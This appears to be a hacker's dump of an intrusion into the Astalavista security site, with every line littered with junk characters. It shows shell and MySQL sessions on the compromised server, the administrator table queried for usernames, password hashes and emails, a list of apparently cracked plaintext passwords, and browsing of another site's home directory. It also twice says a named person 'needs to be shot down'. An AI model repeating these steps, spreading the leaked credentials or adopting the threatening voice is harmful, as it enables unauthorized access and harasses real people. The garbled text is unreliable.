+ G, s' k( Y# y- I: P, | <link>http://www.astalavista.com/exploits</link>3 _) i& f, y' y' h5 s% f# I9 o
<description>All availably Exploits.</description>( ?* P d0 x5 d' E0 I
<language>en-us</language>
9 K: @8 O6 b" m) g3 j# A <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>
$ p! W9 f" Z+ B1 v <docs>http://blogs.law.harvard.edu/tech/rss</docs>
' Z: t5 B: {8 D# E! ? <generator>Astalavista.com</generator># \" p: R+ C, a. h: N, ~/ e
<webMaster>[email protected]</webMaster>’ . $items . ‘
8 T: ~4 h' Y. j! p3 r </channel>5 _( i. U, U5 `: p, }. J
</rss>’;
$ K3 D3 [- m! ?$ [9 o3 w/ C) Z" ~& C8 s4 R1 [3 \4 f
if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {' ?! ^) g$ L* i
unlink (FULLPATH . ‘/feed/exploits.xml’);4 s! C4 F8 m% n; W1 D" R
}+ h, y% c! P& h- ]' y) b
3 m# K+ K5 C+ d9 U) c& J
file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);7 @" F* O, u; q' @; l, t" A
[snip]
8 V! h8 d& p2 M& N- M2 n- _! d8 b# n' s# d& H
sh-3.2$ cat exploits.sh1 s, M% p" B9 T- @. P1 Y0 w
#!/bin/sh0 q0 d# o4 c2 `; m
. w" {7 b& w& o' U0 p
###########################################################
- A/ }1 N- G6 O+ V3 _/ _, I# #$ K5 x* t0 R8 ]1 L; v; ^
# Title: milw0rm exploits adder #
. V% \0 I( i# B( {& f" `# Description: Add all milw0rm exploits to the #
& K6 m! p C# R( N3 u9 _( X% T# Astalavista.com database #$ l" P+ s0 J$ p, a6 Z9 u
# #
0 J% q8 q8 I j, O* o5 J8 T# Company: Astalavista Group #' c; {$ s! w* T
# Author: Paulo M. Santos #7 h% X% W# j6 B
# E-Mail: 链接标记[email protected] #
5 p& d' J7 @8 d+ o9 A" {" O- n# #
& Y7 ?$ S" G7 l* x9 j###########################################################0 t" g$ i' z7 Y& Y _
! W f1 I6 ]' r2 S- G1 d9 w# path
% O5 }( ^: I% C9 Q4 E# Lthis_path=/home/com/public_html/modifications/cronjobs
( Q0 j' r9 A9 X( L$ _7 L! F$ f, O0 f: j- \1 A
# change directory: d! p- q: f( U' |' E
cd $this_path6 o D% t' v0 B9 a4 v
cd tmp/
7 A( ?5 H3 {% t, l, q/ D
3 |6 l; V. \- R/ Y2 P# delete files
; `" j* L2 p8 \) Q! T6 F+ lrm -rf milw0rm.tar.* &; d$ C5 C1 P1 Q1 o) N9 r h' N, w$ }
rm -rf milw0rm/ &: a' s" P9 e) ^. h4 u
( y% `3 g$ B+ N; `( ^
# wget milw0rm paket
) L# [. [4 c" |5 `4 X |$ t6 Uwget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
! E+ z8 g8 N, p! O G
6 k% O" |" e C) H0 {. O7 s# extract milw0rm paket
4 \& F1 M9 P. star -xvf milw0rm.tar.bz2
! Z" v' U% v1 L3 I# x! w. ]: K0 a0 f" |% x0 t; C/ I; o2 J' z
# change owner
8 ^% [+ P! {" V$ r" z. ^chown -R com .
. ^1 [$ P! v4 ^2 \' a& p1 ^) Mchgrp -R com .1 g/ y, v7 Z: {9 ]0 M7 ?
5 T6 }+ b% k5 g3 z! w+ U" s& |
# execute php script
" ?( g" x; [& ~5 j: N" ^ bcd $this_path
1 d; T5 y6 |# m5 Vphp -q exploits.php
5 z; h U: J1 n6 B- `/ ^3 N
# M$ o# q2 p$ `5 E0 E7 o# delete files+ |8 w4 z& b; A; a9 I& I( d$ h/ v
rm -rf tmp/milw0rm.tar.*) N/ M( P& h4 G; h
rm -rf tmp/milw0rm/- {* U6 O+ }! A' G
1 l- [8 i/ W# C" ]" K f/ Dsh-3.2$ echo “Paulo M. Santos needs to be shot down.”
' {5 a. H4 a+ Z. h9 S7 ]; lPaulo M. Santos needs to be shot down.
9 K7 L0 @4 N& g9 z* Q/ g* |, @4 [4 b2 s" t
mysql -u contrexxuser2 -p- _# Q: m0 z1 g3 K3 I0 x
Enter password:
5 L8 `% p0 k# s5 F# H; T6 YWelcome to the MySQL monitor. Commands end with ; or \g.8 \6 P. I; _! `) p
Your MySQL connection id is 261694
# I/ }: [3 H( N. F# H# e' yServer version: 5.0.45-community-log MySQL Community Edition (GPL)( I% R* h# Q, D" ~: a* [1 ^
8 H# U" Z1 T: J/ H7 b
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
9 {- r9 |$ W/ P T! m( P$ @1 m
1 d, D/ K9 ^2 b) umysql> show databases; |. W. W0 k: i# ~3 _
+——————–+
/ \$ c1 B, w/ r* x/ Y| Database |
/ U& V4 q& @! q/ ?+——————–+( S: ?+ z- ~! A" h
| information_schema |9 l- f* Y+ @, q9 y- u4 b8 ]3 z* \
| com_contrexx2 |5 E M3 B8 u3 K4 j
| com_contrexx2_live |( o; |7 N: _3 E' v. H" o: {4 p
| test |
' d3 k9 U. ~9 \' Q4 I+——————–+
6 M* `" V2 R6 U$ n2 S3 F4 rows in set (0.00 sec)- f1 {- a' L/ D. }
9 D0 b, V y1 m1 b
mysql> use com_contrexx2_live; V' @& l- u- l% z, h6 `* W
Database changed& c# |1 n; _1 ~9 y0 \+ v; Z4 c
mysql> show tables;/ l. c- F% L8 i6 j5 Q
+————————————————–+: E/ Q: t! g8 t
| Tables_in_com_contrexx2_live |
; E1 ^+ \, V; T0 W9 m+————————————————–+6 V! p6 m8 ~5 d/ n; ]9 V; d2 Q
| cc_banner_counter |/ {/ J& o4 F# T/ V; ?/ j
| cc_search_counter |+ H, J5 P/ U3 N4 r4 u
| contrexx_access_group_dynamic_ids |# {+ {% h( N7 J) X% S0 z
| contrexx_access_group_static_ids |% r& @( _0 G) o/ |8 y* N
| contrexx_access_rel_user_group |
, [0 g; P2 b& N" m| contrexx_access_settings |
3 u9 ?7 A4 }$ H5 l7 X% _' x2 X| contrexx_access_user_attribute |" w0 Z$ [& E8 ~ m1 Z1 X
| contrexx_access_user_attribute_name |
" h# U6 \- u6 } q; h8 T, ?9 G* [1 l| contrexx_access_user_attribute_value |
. x( B" ^( [! |7 |5 Y3 J| contrexx_access_user_core_attribute |. L) M' B$ r) S! Y- V; W" L
| contrexx_access_user_groups |; U! L2 Q/ f, L
| contrexx_access_user_mail |
: X7 d2 z' {9 ?) }| contrexx_access_user_profile |
8 W7 f$ O2 H8 I5 K2 j3 O; N( ~" K| contrexx_access_user_title |/ ^8 o+ L4 v4 W8 Z U5 ]6 [) D( W1 U
| contrexx_access_user_validity |" v) W, E2 q2 I8 M t
| contrexx_access_users |( P4 `4 i! s, X
| contrexx_backend_areas |# i, z [# I6 _! J
| contrexx_backups |
/ W3 H/ }+ `! A| contrexx_content |
( F' p0 i* L; t| contrexx_content_history |; O& Z9 ?! O' ^6 k. [
| contrexx_content_logfile |. Y; x0 I0 O9 p
| contrexx_content_navigation |
. s' V3 l/ H$ F7 s6 p| contrexx_content_navigation_history |* c; P! M R0 c r! |! Y8 h
| contrexx_ids |& M }. b r5 v& q2 u! {
| contrexx_languages |+ G% J: r3 s8 a$ f! Q5 L# Q) c
| contrexx_lib_country |# O* d, F' h# g& Q' \6 e
| contrexx_log |
7 U7 |) f/ B1 ] d- n| contrexx_module_alias_source |
; T9 P4 i' N9 t! R) B) M8 g* T| contrexx_module_alias_target |8 Z' d [; y# t" q, p' y4 v
| contrexx_module_block_blocks |
/ q( K) H8 t7 i4 ?# N| contrexx_module_block_rel_lang |
# Z& a7 x; U i0 Y| contrexx_module_block_rel_pages |6 m6 [9 Z* Z9 b
| contrexx_module_block_settings |
1 Z4 D7 H5 w$ ]' X| contrexx_module_blog_categories |
& R4 W/ ~- E, }3 m| contrexx_module_blog_comments |
; H) B0 h- H. t$ y! q2 ^| contrexx_module_blog_message_to_category |' E: f! j9 T$ [3 `, V- f) V4 k" a; F
| contrexx_module_blog_messages |
3 u) I, w* c+ F' ], J$ [6 l L$ p| contrexx_module_blog_messages_lang |
# I* f9 U1 |" S| contrexx_module_blog_networks |; }2 D u+ e3 ~2 {7 n
| contrexx_module_blog_networks_lang | Y' v; }# J8 }9 d: b& x
| contrexx_module_blog_settings |# x) G0 ^& i2 F& Y! q
| contrexx_module_blog_votes |
! a$ ` O* S9 q$ c2 n6 y' B| contrexx_module_calendar |
$ w3 a6 N' S/ w3 p i9 `| contrexx_module_calendar_access |
p- ]6 y* L! @| contrexx_module_calendar_categories |
1 x, e2 d& F" N+ E) U| contrexx_module_calendar_form_data |8 l6 ]8 \- n0 ^6 s% k
| contrexx_module_calendar_form_fields |/ ~! A4 ^1 V8 e$ z* \
| contrexx_module_calendar_registrations |# b' \6 z, a- {3 w- g
| contrexx_module_calendar_settings |
& g: K/ ^+ j& U3 H, W9 v8 || contrexx_module_calendar_style |
/ a* }# C" _! t. N4 C/ U| contrexx_module_contact_form |
4 T( @% O0 J: ^; ?6 h| contrexx_module_contact_form_data |0 ]! X1 x( Z9 T: S9 K8 B
| contrexx_module_contact_form_field |$ G0 b' R9 u" h
| contrexx_module_contact_settings |0 e6 o% ~4 x+ h$ P) V
| contrexx_module_data_categories |
$ t3 j5 S1 a6 l| contrexx_module_data_message_to_category |7 ~6 T3 Y2 ~/ G) \, \+ U
| contrexx_module_data_messages |% z8 Y% F/ G" t$ U
| contrexx_module_data_messages_lang |# z1 I6 G1 ~6 H+ x, Q
| contrexx_module_data_placeholders |( `2 R" ?2 e7 y
| contrexx_module_data_settings |
, c! S4 D5 Q; r! j' w9 M0 i5 D| contrexx_module_directory_access |
: Y$ w) h1 U, U( E; k5 J| contrexx_module_directory_categories |
6 y( V5 e# u5 p- C4 h| contrexx_module_directory_dir |
/ y6 S: b4 a9 F. j% M| contrexx_module_directory_inputfields |
+ k/ v+ ]1 n. P$ ^| contrexx_module_directory_levels |
% n% [0 q8 g3 K5 Y# U" ^| contrexx_module_directory_mail |
# p8 c( X; {( h7 `) \3 U& E| contrexx_module_directory_rel_dir_cat |
! M2 p; B% d) P+ J6 || contrexx_module_directory_rel_dir_level |
/ Z+ f1 x) V J; y# X6 K& ~+ X+ [| contrexx_module_directory_settings |
5 s) D M8 x" b' || contrexx_module_directory_settings_google |
( ^8 l% }2 [2 t. g1 x3 i& L| contrexx_module_directory_vote |; M- c, o( `; h* e8 B' u$ g
| contrexx_module_docsys |
5 `( _( N0 s/ W6 z9 T6 j+ k7 ^| contrexx_module_docsys_categories |
# I+ U& ?) v6 | v7 G1 O7 e| contrexx_module_egov_configuration |8 K( b2 ?, J0 L F8 M
| contrexx_module_egov_orders | K; J) u# X! {' h0 U* L) n: B6 n
| contrexx_module_egov_product_calendar |
' T1 o, P _% z$ @& Y; h, H! || contrexx_module_egov_product_fields |
6 f$ v0 f- _! \# ?" }/ G8 @| contrexx_module_egov_products |
. \$ t* w( N) u| contrexx_module_egov_settings |
* @9 b& z8 W2 W| contrexx_module_exploits |
3 {3 R7 W' Y% `- || contrexx_module_exploits_categories |, n0 F4 s8 D+ G
| contrexx_module_feed_category |
5 X* M7 Q: Z% Q9 l3 }. T% c1 x| contrexx_module_feed_news |
" K. L! M$ n: v| contrexx_module_feed_newsml_association |
! x3 D8 H8 Z* r1 q6 O| contrexx_module_feed_newsml_categories |' a4 v9 G& s5 ]% ?9 y0 w# N
| contrexx_module_feed_newsml_documents | {' m( p8 @8 B2 N3 H! V6 o! Y4 C
| contrexx_module_feed_newsml_providers |! d% Q8 G3 U# j
| contrexx_module_forum_access |- q9 S5 g( ?! R# K* y/ |
| contrexx_module_forum_categories |
+ |! P g! F C8 t! `* F| contrexx_module_forum_categories_lang |
( f) `" y3 y A. \| contrexx_module_forum_notification |
- Y9 S/ `2 {$ d$ ?| contrexx_module_forum_postings |
+ x% t% [0 H1 z0 X4 C1 ^| contrexx_module_forum_rating |7 c& A* J! n) J/ F
| contrexx_module_forum_settings |
$ ?0 g/ m8 O' e# h9 G" E+ ]2 b1 V| contrexx_module_forum_statistics |' g% ^+ e2 v' o5 a) A! y _ R% [
| contrexx_module_gallery_categories |* c! T9 g( s& R5 P n3 A a
| contrexx_module_gallery_comments |
! K9 \# W$ g) O, i, F| contrexx_module_gallery_language |
! @9 s& V$ h U+ E5 `- u& L| contrexx_module_gallery_language_pics |
9 k, w- Q- C: {1 n) e$ w& b/ H| contrexx_module_gallery_pictures |
) Z9 ~, z7 a4 }3 Q) g| contrexx_module_gallery_settings |4 t8 a x" s. R* P; p1 V- J- K
| contrexx_module_gallery_votes |" E7 C) l2 H4 x# S+ W9 m: F
| contrexx_module_guestbook |
$ \9 t9 D# l4 b+ z# J| contrexx_module_guestbook_settings |/ o' U4 w8 e! O D( X
| contrexx_module_livecam |$ }3 e/ V" M6 c1 r+ [1 n
| contrexx_module_livecam_settings |
3 Z$ x; D; i9 @0 `# {; g L| contrexx_module_market |
+ O0 ~- E1 U" m6 q* k4 L2 _| contrexx_module_market_access |6 s- m- u4 i8 x6 N4 K) \! t$ @
| contrexx_module_market_categories |4 y+ {3 a. T& z
| contrexx_module_market_mail |
6 V& I b5 i" ^4 b9 w" g* [| contrexx_module_market_paypal |1 W! z6 u' M7 b+ J
| contrexx_module_market_settings |
' ^( f' q! k4 o: z| contrexx_module_market_spez_fields |$ q% ~ o! ^) z
| contrexx_module_mediadir_access |
) u! F9 i! Y% h4 k9 A, `1 _* Z% Y| contrexx_module_mediadir_categories |
& w" u5 R4 ]5 [2 _. c! {+ o* `| contrexx_module_mediadir_comments |) a, H/ ]( T0 z. Q4 N+ ^3 O. ]
| contrexx_module_mediadir_dir |
* | k- @% H+ d& z| contrexx_module_mediadir_inputfields |+ `; r# Q' L1 I: F
| contrexx_module_mediadir_levels |/ Y: q: m& |: _, S; O7 D8 d" ?
| contrexx_module_mediadir_mail |
: c/ c3 a4 z4 \+ m( C: z: V; K# o| contrexx_module_mediadir_rel_dir_cat |# s7 e. Z1 `3 P$ D; c' X0 c
| contrexx_module_mediadir_rel_dir_level |
, [0 q) P, p( ?4 f: F3 D| contrexx_module_mediadir_reports |5 Q. a6 [. S U2 f' G! I( h% N
| contrexx_module_mediadir_settings |
3 t& U8 {. J* |6 u0 r7 m| contrexx_module_mediadir_settings_google |8 m* }3 m; m3 P5 x/ |
| contrexx_module_mediadir_vote |
: \' O" J. [8 I w6 P j' L4 m| contrexx_module_memberdir_directories |
1 @6 I q6 V+ N! H3 f( K| contrexx_module_memberdir_name |, r& I+ Q& e9 a" Q! [
| contrexx_module_memberdir_settings |
8 @. ?( @2 A$ B- S8 I) b| contrexx_module_memberdir_values |' y, _" h) G2 y y9 Z
| contrexx_module_nettools_allowed_groups |
# ?$ L- y: Y" |# T6 d| contrexx_module_nettools_settings |' Z& x/ `! I v2 e2 s2 `
| contrexx_module_news |# N) L4 `0 @2 ~. r5 w
| contrexx_module_news_access |) u* m! s: R E/ m) N6 ~& x+ \
| contrexx_module_news_categories |* H0 b6 E7 O% g- `5 X9 B5 z* G4 q
| contrexx_module_news_settings |
" | V5 Z$ ^8 A6 R A| contrexx_module_news_teaser_frame |1 O2 }" j) p+ \, v( \
| contrexx_module_news_teaser_frame_templates |( b, v" E6 N! o X
| contrexx_module_news_ticker |
) b% ?0 z1 Q$ f q9 d| contrexx_module_newsletter |
3 |$ C" T; B- ^) z7 w$ g| contrexx_module_newsletter_attachment |
, @! D5 S+ E: @9 z# F2 P| contrexx_module_newsletter_category |8 W3 ]: p+ x, B5 M2 k9 l- Q, e4 W
| contrexx_module_newsletter_confirm_mail |
( O1 S; K0 t* Z t. K5 \( m| contrexx_module_newsletter_rel_cat_news | ?5 h- N" W7 H5 t- ~8 C( k
| contrexx_module_newsletter_rel_user_cat |( ~1 k6 q, P9 B8 K+ a) x- X7 Z2 o
| contrexx_module_newsletter_settings |" _. _1 c: t5 ~8 c( q* |
| contrexx_module_newsletter_template |+ m4 L1 N2 e: z: G+ s
| contrexx_module_newsletter_tmp_sending |. A$ I b" G& O. `* J& g( b$ E
| contrexx_module_newsletter_user |. D+ m: k6 @, p- C; n/ X
| contrexx_module_newsletter_user_title |2 S1 e7 S Z; Q- ]( U2 w, v5 @
| contrexx_module_onlinetools_defaultports |, a7 i$ q: b* [# X
| contrexx_module_onlinetools_defaultports_back |
' u6 Z) s- y. [0 Y5 E; S/ ?% H| contrexx_module_onlinetools_geolitecity_blocks |5 y6 \6 m- B6 ^, j6 o
| contrexx_module_onlinetools_geolitecity_country |
- O+ \8 W9 L, c% Q4 ?| contrexx_module_onlinetools_geolitecity_location |6 K7 Z$ D& ~: F3 [- E/ {
| contrexx_module_podcast_category |
{* L! Y7 p: N- t M7 T| contrexx_module_podcast_medium |. n" i5 O2 Y& R { Z; t) w
| contrexx_module_podcast_rel_category_lang |
' C1 {( O2 b8 k* r. ]8 s| contrexx_module_podcast_rel_medium_category |/ @, @5 ?. W3 H9 w7 h* y( \
| contrexx_module_podcast_settings |
4 d$ ~# T8 l/ o| contrexx_module_podcast_template |
2 m# Y; Q U9 M4 X| contrexx_module_proxydb |
" j$ r% J$ K. q8 `3 J! || contrexx_module_recommend |
( q c3 D' W- T$ z/ V| contrexx_module_repository |
" A, k2 I6 G; h, v| contrexx_module_securitynews_cats | j# ~2 ^0 k6 }) A
| contrexx_module_securitynews_feeds |
7 X0 C/ Q* G5 ]% c( d: N! n7 n1 D| contrexx_module_securitynews_news |+ l/ a+ T+ q1 E o+ Z. M- I
| contrexx_module_shop_categories |8 l( K1 D5 J. C3 v
| contrexx_module_shop_config |* [: w* ^5 f+ M2 j
| contrexx_module_shop_countries |
! {8 ]9 q% ?6 B! j4 f3 f$ {| contrexx_module_shop_currencies |
7 `( q5 P4 f( N7 [ a# v| contrexx_module_shop_customers |+ L D7 S2 B' Z
| contrexx_module_shop_importimg |
& c5 d1 w/ t+ H% ?| contrexx_module_shop_lsv |0 [2 C% J! ?* p; g0 q! Y$ C, Q
| contrexx_module_shop_mail |
: R/ H5 M1 Q6 i. V| contrexx_module_shop_mail_content |5 V- C. S! P" y
| contrexx_module_shop_manufacturer |& ^, g- p" Q# M
| contrexx_module_shop_order_items |. d% {2 v/ Z' ~5 t7 d- p4 q* i0 \, b
| contrexx_module_shop_order_items_attributes |0 N7 _; L, @ `# R: o7 }. f
| contrexx_module_shop_orders |
. J9 D5 L5 O9 M4 k; I" ]: W u| contrexx_module_shop_payment |
( j$ g+ k5 a% m% `* W# U| contrexx_module_shop_payment_processors |. ?; ~% X/ e% u% P. S- O
| contrexx_module_shop_pricelists |4 G% K1 S- `4 I0 U+ `
| contrexx_module_shop_products |, B. u- l/ ^) |$ c1 |) u
| contrexx_module_shop_products_attributes |
7 }2 Q* W- G6 a/ C| contrexx_module_shop_products_attributes_name |6 s2 u1 {1 W& _4 S4 B% u
| contrexx_module_shop_products_attributes_value |
^: L* W( f; }" ~$ n& Z+ ^4 R; y4 s( d| contrexx_module_shop_products_downloads |
& `. Z$ G' i: i| contrexx_module_shop_rel_countries |
, n( I9 O- e, ~: \$ W$ g5 a! l! M| contrexx_module_shop_rel_payment |
7 C( v& Z5 o8 o! s, e; _| contrexx_module_shop_rel_shipment |/ I: s7 A, k* A( {' R \0 K; g
| contrexx_module_shop_shipment_cost |
% e2 \4 W8 J# f: M& c6 [| contrexx_module_shop_shipper |" t+ v& F6 p3 Y
| contrexx_module_shop_vat |6 d; v1 B6 f& \* o$ B& Y. _
| contrexx_module_shop_zones |6 y: k6 z( P1 @, B# M
| contrexx_module_u2u_address_list |2 x' N8 U5 q j5 s: _9 s
| contrexx_module_u2u_message_log |
: X/ v) U$ Q7 |3 O" _1 [( c| contrexx_module_u2u_sent_messages |2 Q N' i0 d2 t6 {
| contrexx_module_u2u_settings |
6 d8 A' ?8 ?- }8 ]! ]2 f6 d" {3 g| contrexx_module_u2u_user_log |; G: a1 w# s; t) ~5 B$ D0 H
| contrexx_modules |+ U/ M1 m6 {! p, o% t. z/ A, s
| contrexx_sessions |
0 |5 h8 F% Z, _: ]| contrexx_settings |* F9 p, ~, x1 U2 J, I& _6 |
| contrexx_settings_smtp |5 a/ O. p* q* O6 p+ Q) u
| contrexx_skins |1 r! L: S# _; Z
| contrexx_stats_browser |! W! t% B4 c4 c
| contrexx_stats_colourdepth |
[/ z0 a# d" ?. V8 T4 ^0 p7 g9 {| contrexx_stats_config |
; ?1 t2 r; C+ X1 p4 r2 H* v8 U| contrexx_stats_country |; t" E. ]' i: O! _) `
| contrexx_stats_hostname |
6 L/ |/ D4 b& C+ W& j, K| contrexx_stats_javascript |% r6 v% [, w5 Q, l! P- ]: J9 V% |
| contrexx_stats_operatingsystem |( @7 `3 N5 B$ R2 n; K
| contrexx_stats_referer |' b% v/ F7 B* ^( P0 y$ O
| contrexx_stats_requests |2 R9 u% Z: b; L1 d) D6 x! u
| contrexx_stats_requests_summary |9 x& n3 ?' h& L% o7 w# W
| contrexx_stats_screenresolution |4 D4 H. ~ h( M( b& J" b
| contrexx_stats_search |
L. |4 q/ d/ Q| contrexx_stats_spiders |$ b9 H U9 o! v: Z! z2 ?0 c' e
| contrexx_stats_spiders_summary |& g& J. h7 n0 P3 g* \* D0 E( U
| contrexx_stats_visitors |$ T; U9 F1 L, C6 I+ ]! w+ [
| contrexx_stats_visitors_summary |( Z! A( M, c$ n$ z
| contrexx_voting_additionaldata |& w! s# E2 c9 s" ?6 @
| contrexx_voting_email |$ S! R' h/ y6 a' ^0 \
| contrexx_voting_rel_email_system |
% ^4 \( g% Q' N0 K. i3 |! ~| contrexx_voting_results |
* K" Q8 I5 e/ F) M| contrexx_voting_system |& F, h+ J( ~0 H1 r; K
| foo |
) w: @* S q! C1 F3 [7 [5 b$ E- |( x# F+————————————————–+0 I$ o/ q+ O/ G* j4 W- m i/ t
227 rows in set (0.01 sec)
# S& ~2 u$ l+ D" F7 ?* Z
% ?7 h: M/ e# F; f$ @mysql> select count(*) as skids from contrexx_access_users; p( f# D i1 Y& D
+——-+
3 M% F# ~+ J2 e6 @7 Z7 C; D y. j| skids |# z1 p1 |6 `: [. P1 R$ k
+——-+
5 P8 _5 _- i; h# l; p4 E+ |% C| 53699 |
% L1 L/ H5 L0 B+——-+
2 O* z8 l P+ D+ m1 row in set (0.00 sec)4 }' h, p* d. K
9 ^5 J& j4 k! s8 f; f
mysql> describe contrexx_access_users;
) |2 Q" k, L g" e6 e H$ l+——————+——————————————+——+—–+————–+—————-+
6 ?1 m4 e) f/ J- o$ ?* j. S| Field | Type | Null | Key | Default | Extra |
, f% Q1 l1 _# f9 V+——————+——————————————+——+—–+————–+—————-+
) |, ~4 z3 Q3 [; @| id | int(10) unsigned | NO | PRI | NULL | auto_increment |5 D: c4 X1 m ]* k1 s, D
| is_admin | tinyint(1) unsigned | NO | | 0 | |) c/ B$ p5 B9 W! Q$ L! ^1 F
| username | varchar(40) | YES | MUL | NULL | | V- ^& k8 Z* B
| password | varchar(32) | YES | | NULL | |
! @6 V+ Q% m# W. k: V I| regdate | int(14) unsigned | NO | | 0 | |
5 L2 K+ ]( n* F. M4 [. L' F| expiration | int(14) unsigned | NO | | 0 | |
- Y* b6 F& V8 O. I+ Z& L| validity | int(10) unsigned | NO | | 0 | |
9 t6 I5 r* G' |- Z| last_auth | int(14) unsigned | NO | | 0 | |
9 Y$ Z, [. L2 v! r3 s| last_activity | int(14) unsigned | NO | | 0 | |6 `) X3 Y; ^0 D7 s# M [. q" y0 ^
| email | varchar(255) | YES | | NULL | | N, e- K" q7 f% {9 U
| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |
4 w$ E% ? \; s, Z| frontend_lang_id | int(2) unsigned | NO | | 0 | | n7 b! N. B# h
| backend_lang_id | int(2) unsigned | NO | | 0 | |
# O. R1 a* e0 `| active | tinyint(1) | NO | | 0 | |
- H! z7 ]" ~) B; q| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |
0 n4 a/ ~6 O2 {# o, P- ]| restore_key | varchar(32) | NO | | | |
0 b5 K2 [- {5 M# || restore_key_time | int(14) unsigned | NO | | 0 | |
. |: b. n$ Z3 u! {/ \6 Q( t! a- J5 j| u2u_active | enum(’0′,’1′) | NO | | 1 | |
0 }. I2 J3 x; s* ]6 o+——————+——————————————+——+—–+————–+—————-+
6 }( M" m! K( { ?: C5 n9 `18 rows in set (0.00 sec)
, U& _% T4 M+ _6 W: N
3 u7 Q. X i7 `, e% v6 R% nmysql> select username,password,email from contrexx_access_users where is_admin = 1;& `" l4 R* r: @
+————+———————————-+—————————–+- e9 q: K: E1 g2 v" _& E
| username | password | email |
' L0 ]/ M9 q/ g+————+———————————-+—————————–+5 `+ t! M! b/ [( I; [6 x
| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记[email protected] |% u5 l( j4 I6 g+ S! l
| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记[email protected] |. T2 D. _9 r$ D v: p6 t
| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记[email protected] |
, D0 @7 z. E% O0 Z| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记[email protected] |8 s8 |- ~& K5 c& Q6 \4 S' F8 _9 H4 F
+————+———————————-+—————————–+' z2 i. ~2 ^- K% H1 _# o
4 rows in set (0.04 sec)
1 s" y7 b. g# y, l: y% K
+ U* L* ?% I! v1 K, y% x* o3 k# M7 Rmysql> exit;
1 W/ J. }( a) }) Y& x0 w, s! wBye1 \# |8 I$ ^- X
o, a+ k3 F% f" |+ I! _
[~] There you go, your “team of security and IT professionals” is a joke.
+ k" N; y0 e' @& C; V
3 \) }2 f1 T% Q9 }; Z+——————————+
6 z4 l' O) t! J) T, ^& B( m7 Jsystem:f82BN3+_*3 j& S+ r% z! A0 @% ` t: I& a8 W) }
Be1er0ph0r:belerophor4astacom
+ h7 b& C( ^/ {+ S: U' b/ M; pprozac:asta4cms!
/ K/ k( u: ^& ?! k; h1 U" p# H# Scommander:mpbdaagf6m2 ~% b6 W( o" L
sykadul:ak29eral* ~: @, P% M1 y2 t( d3 M
+——————————+
& K1 J6 b* l; n; m
( Y# j# @; _+ f; d7 L4 v/ P[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)" M _- v# E8 [ b' e: Y
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.
" E0 c. q, H, U* x M6 a7 x- D* C4 r# c% d* h' Z/ p& A
[~] Lets move to astalavista.net now,4 w( r3 e5 ?) m- T0 ~5 {2 l
! ~3 x7 o- E; H1 I( F7 X5 ]
From <链接标记[url]https://www.astalavista.net/[/url]>:
# |5 d% w8 i: }$ c>> Everyone knows that the best defense is a good offense.
6 o# }% X @, ^: j! `+ X# _1 V9 X>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.; I' Q8 ?& c) L9 |8 h6 |& k
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
! R3 |5 S( V `7 d; I>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”' @4 g X( n: L% ^9 L
; a5 c u8 `- |0 |. L8 z/ _% L
>> Go ahead, try and hack our server . in a completely legal way!1 w! U: S$ n" P
>> Learn by doing: We offer our members tricky tasks and challenges on an
- c1 M4 e1 C3 ?- I3 Z$ m1 ?>> ongoing basis so you can test your knowledge and abilities. You can also! |( {3 E' b" o) ]! `) ?
>> demonstrate what you.ve mastered by taking part in regular hacker contests) e1 c/ q: K: i |4 `# p# ?! t
>> and war games0 c3 _* G- r$ G/ h! N9 b/ h8 x4 ~9 Q7 ^
! r- B' A/ f' W$ W. ~; d0 n[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
- O+ ]4 C: l& q% Z4 z, u: V! P6 J2 x1 _, x3 i; O8 Z9 r" E
[-] Tricky task: Find home dir of astalavista.net$ o" T8 t! r- {! k
) j8 s, \& ~5 j9 t7 a1 a! }2 vsh-3.2$ ls -la ~astanet/ G6 F9 P; P1 @4 w4 S2 r6 j
total 48
& u' i5 c$ J" Hdrwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .
: G" F9 b1 _: Z, b$ P+ adrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
' x" E! O5 Z5 [ @/ F8 Sdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth; g/ R( d1 b' f3 z- c7 R% `5 b; m
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history- C" k& W4 a" Z6 A6 \
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout4 `: D) m; I& z
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile _( T: C3 p; v# |$ h$ c9 c
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc; F6 E& K1 ~. h" ]
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains4 P1 ^6 O/ C' B; A1 i
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap* Y. q9 t- Q) x2 U( d
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail9 c( J* s! {( A+ \( `/ A
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
; E; b! I3 w2 h$ E6 F" ^-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow% w, a. ]; W K4 q) y
' d1 Z# b0 f$ d3 A7 [2 O) M) ^
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
6 S9 D7 Z& ^- u7 a3 ]* h* i- f3 Vsh-3.2$ ls -la# U1 ]2 ^0 }# O
total 2001 v, @5 a' T0 @! ~$ g& z2 @
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .6 n6 {; z1 I- E8 i1 Q5 U, Y
